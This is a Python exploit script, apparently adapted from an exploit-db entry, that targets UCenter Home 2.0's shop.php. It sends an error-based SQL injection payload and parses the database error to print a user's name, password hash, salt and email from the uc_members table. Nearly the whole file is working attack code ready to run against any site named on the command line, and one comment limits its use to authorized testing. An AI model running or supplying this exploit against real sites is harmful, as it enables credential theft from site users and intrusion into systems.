#!/usr/bin/env python
import sys
import urllib2
import re
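def info():
    """Print provenance and usage for this script.

    Uses the ``print(...)`` form so the same text is emitted under both
    Python 2 (where a single parenthesised argument prints unchanged) and
    Python 3; the original statement form was Python 2 only.
    """
    print('From:http://www.exploit-db.com/exploits/14997/')
    print('changed:qiaoy')
    print('exp:')
    print(' ./UCenter_Home_2.0.py site')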
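def main():
    """Entry point: read the target from argv, send the probe, print the leaked row.

    Usage: ``./UCenter_Home_2.0.py site`` (scheme optional, defaults to http://).

    The single request below is a SQL injection against the target's
    ``shop.php``. Run it only against systems you are explicitly authorized
    to test.
    """
    if len(sys.argv) != 2:
        info()
        return

    site = sys.argv[1]
    # Accept a bare hostname as well as a full URL; default to plain http.
    if not site.startswith(('http://', 'https://')):
        site = 'http://' + site

    # Error-based extraction: the GROUP BY on a rand()-derived key forces a
    # duplicate-key error whose text echoes uid:username:password:salt:email,
    # wrapped in ~'...'~ markers and followed by the floor(rand(0)*2) digit.
    url = site + '/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1'

    try:
        # Bounded wait so an unresponsive host cannot hang the tool forever.
        body = urllib2.urlopen(url, timeout=30).read()
    except (IOError, ValueError) as exc:
        # urllib2.URLError/HTTPError subclass IOError; ValueError covers a
        # malformed URL. Narrowed from a bare except so real bugs still surface.
        print("Sorry,I can't work............")
        sys.stderr.write('Reason: %s\n' % exc)
        return

    # Stop the capture at the closing '~ marker. The original pattern ran on
    # to "' for key", which swept the trailing "'~<digit>" into the last
    # (email) field.
    leaked = re.findall(r"Duplicate entry '~'(.*?)'~", body)
    if not leaked:
        # The page did not echo the MySQL error, so there is nothing to parse.
        print("Sorry,I can't work............")
        return

    fields = leaked[0].split(':')
    if len(fields) < 5:
        print("Sorry,I can't work............")
        return

    # fields[0] is the uid; the original tool never printed it, and neither do we.
    print('Name: ' + fields[1])
    print('Passwd: ' + fields[2])
    print('salt: ' + fields[3])
    print('email: ' + fields[4])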
# Script entry guard: only run when executed directly, not when imported.
if __name__ == "__main__":
    main()